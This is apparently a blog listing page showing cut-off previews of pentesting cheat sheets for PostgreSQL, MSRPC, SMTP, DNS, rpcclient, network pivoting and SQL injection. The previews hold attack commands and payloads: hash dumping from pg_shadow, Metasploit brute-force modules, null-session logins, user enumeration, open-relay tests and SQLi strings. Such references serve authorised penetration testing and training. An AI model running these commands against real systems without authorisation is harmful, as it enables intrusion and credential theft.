Offensive Stack

  PostgreSQL, also known as Postgres, is a powerful open-source object-relational database system. It has earned a strong reputation for its proven architecture, reliability, data integrity, robust feature set, and extensibility. Identify PostgreSQL nmap -sV -p 5432 <target-host> nmap Scanning nmap -sC -sV --script vuln,vulners --script-args mincvss=7.0 -p5432,5433 -Pn 10.10.10.10 #make sure to check for vulnerable versions nmap -sV -p 5432 <target-host> Exploiting Known Vulnerabilities searchsploit postgresql <version> Enumerating Databases and Tables List all databases \l Switch to a database \c <database_name> List tables in the current database: \dt Extract data from a specific table: SELECT * FROM <table_name>; Dumping Hashes SELECT usename, passwd FROM pg_shadow; Accessing File System COPY (SELECT * FROM sensitive_table) TO '/tmp/sensitive_data.txt'; Bruteforcing Postgres Creds #Using Metasploit use auxiliary/scanner/postgr...

  It is also known as a function call or a subroutine call. Default ports are 135, 593. Enumeration nmap --script msrpc-enum -p 135 <target-ip> RPC Endpoints To enumerate RPC endpoints, use impacket-rpcdump. impacket-rpcdump -port 135 <target-ip> | grep -E 'MS-EFSRPC|MS-RPRN|MS-PAR' MS-EFSRPC: It might be vulnerable to PetitPotam. MS-RPRN, MS-PAR: It might be vulnerable to PrintNightmare. Metasploit msfconsole msf> use auxiliary/scanner/dcerpc/endpoint_mapper msf> use auxiliary/scanner/dcerpc/hidden msf> use auxiliary/scanner/dcerpc/management msf> use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor Connect # Anonymous logon rpcclient -N -U "" <target-ip> rpcclient -N -U "" -p 593 <target-ip> rpcclient -N -U "" dc.example.local # Specify username # -W: Workgroup # -N: No password rpcclient -U username <target-ip> rpcclient -W WORKGROUP -U username <target-ip> rpcclient -U username -N <target-ip...

 SMTP (Simple Mail Transfer Protocol) is a communication protocol for electronic mail transmission.it is used for sending e-mail. POP3 or IMAP are used for receiving e-mail. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS)   Connect We can use Telnet to connect to the remote server. Here is a command using Telnet: telnet example.com 25 Enumeration Identifying a SMTP Server You can use Nmap to check if there's an Telnet server on a target host like this: nmap -p25,465,587 -sV -Pn target.com Additional Nmap commands for enumeration nmap --script smtp-brute -p 25,465,587 "target-ip" nmap --script smtp-commands -p 25,465,587 "target-ip" nmap --script smtp-enum-users -p 25,465,587 "target-ip" nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 "target-ip" nmap --script smtp-vuln-cve2011-1764 -p 25,465,587 "target-ip" nmap --script smtp-* -p 25,465,587 "target-ip" Enumer...

Recon Banner Grabbing - Identify DNS Server Versions # Use dig to determine DNS server versions dig version.bind CHAOS TXT @DNS # Alternatively, use nmap script to grab the banner nmap --script dns-nsid <DNS_IP> # Alternatively, use telnet to grab the banner nc -nv -u <DNS_IP> 53 DNS Server Discovery # Using dig dig NS <target-domain> # Using nslookup nslookup -type=NS <target-domain> Enumeration Using DNS enum dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN> Using dig # Query DNS records dig hackviser.com # Query specific type of DNS records (e.g., A record) dig A hackviser.com # Perform a reverse DNS lookup dig -x <IP_ADDRESS> # Query a specific DNS server dig @<DNS_SERVER_IP> hackviser.com Using nslookup # Perform DNS queries nslookup hackviser.com # Query a specific type of DNS record (e.g., MX record) nslookup -type=MX hackviser.com # Query a specific DNS server nslookup ha...

Pivoting for Red Teamers Using rpcclient via Metasploit for Enumeration & Exploitation rpcclient is a powerful tool used for enumerating and interacting with Windows RPC services . It is commonly used in penetration testing to extract usernames, groups, and policies from Windows machines. Using rpcclient Manually (Without Metasploit) If you already have valid credentials (or null session access), you can use rpcclient from Kali Linux: rpcclient -U "" <TARGET_IP> or rpcclient -U "guest" <TARGET_IP> 🔹 If it prompts for a password, just press Enter to attempt a null session login . Common Enumeration Commands enumdomusers # Enumerate domain users queryuser <RID> # Get user details (Replace <RID> with a user RID) enumdomgroups # Enumerate groups querygroup <RID> # Get group details getsid # Get security identifier (SID) lookupnames <...

Pivoting for Red Teamers Pivoting in Red Team Operations: A Complete Guide Introduction In a real-world red team operation , gaining initial access is just the beginning. The real challenge is pivoting —the ability to move laterally, escalate privileges, and compromise additional systems within the network. What is Pivoting? Pivoting is a technique used to route traffic through a compromised host to access internal networks that are not directly reachable. Types of Pivoting Network Pivoting : Routes network traffic through a compromised host (e.g., SSH Tunneling, Metasploit, ProxyChains). Port Forwarding : Exposes specific ports from an internal machine to the attacker (e.g., SSH Local Port Forwarding). Step 1: Pivoting Using Metasploit Setting Up a Pivot via Meterpreter meterpreter> backgroun...

Pivoting for Red Teamers SMTP Pentesting Notes SMTP (Simple Mail Transfer Protocol) is a key component of email communication. Misconfigured SMTP servers can be vulnerable to attacks such as enumeration, open relay abuse, and authentication bypass. Step 1: Enumerate the SMTP Server Connect to the SMTP server using Telnet: telnet <target-ip> 25 Look for the server banner, which may reveal its version and configuration. Step 2: User Enumeration with VRFY & EXPN Check if the server allows user verification: VRFY admin EXPN postmaster If valid responses are received, the server is disclosing user accounts, which could aid brute-force attacks. Step 3: Open Relay Testing To check if the server allows unauthenticated email forwarding: MAIL FROM:<attacker@example.com> RCPT TO:<victim@example.com> DATA Subject...

Pivoting for Red Teamers SQL Database & SQL Injection Pentesting Cheat Sheet SQL databases store crucial application data, and misconfigurations can make them vulnerable to SQL Injection (SQLi) attacks. This guide covers database enumeration, privilege escalation, and SQL injection techniques. Step 1: Identifying SQL Database Type Check the database type by sending payloads in the input fields or URL: ' OR 1=1 -- (MySQL, PostgreSQL, MSSQL) ' UNION SELECT 1,2,3 -- (Check column count) ' AND 1=CONVERT(int,@@version) -- (MSSQL Test) Observe the error messages for database identification. Step 2: Enumerating Database Tables & Columns Use SQL queries to extract database structure. For MySQL: SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE(); SELECT column_name FROM information_schema.columns WHERE table_name='user...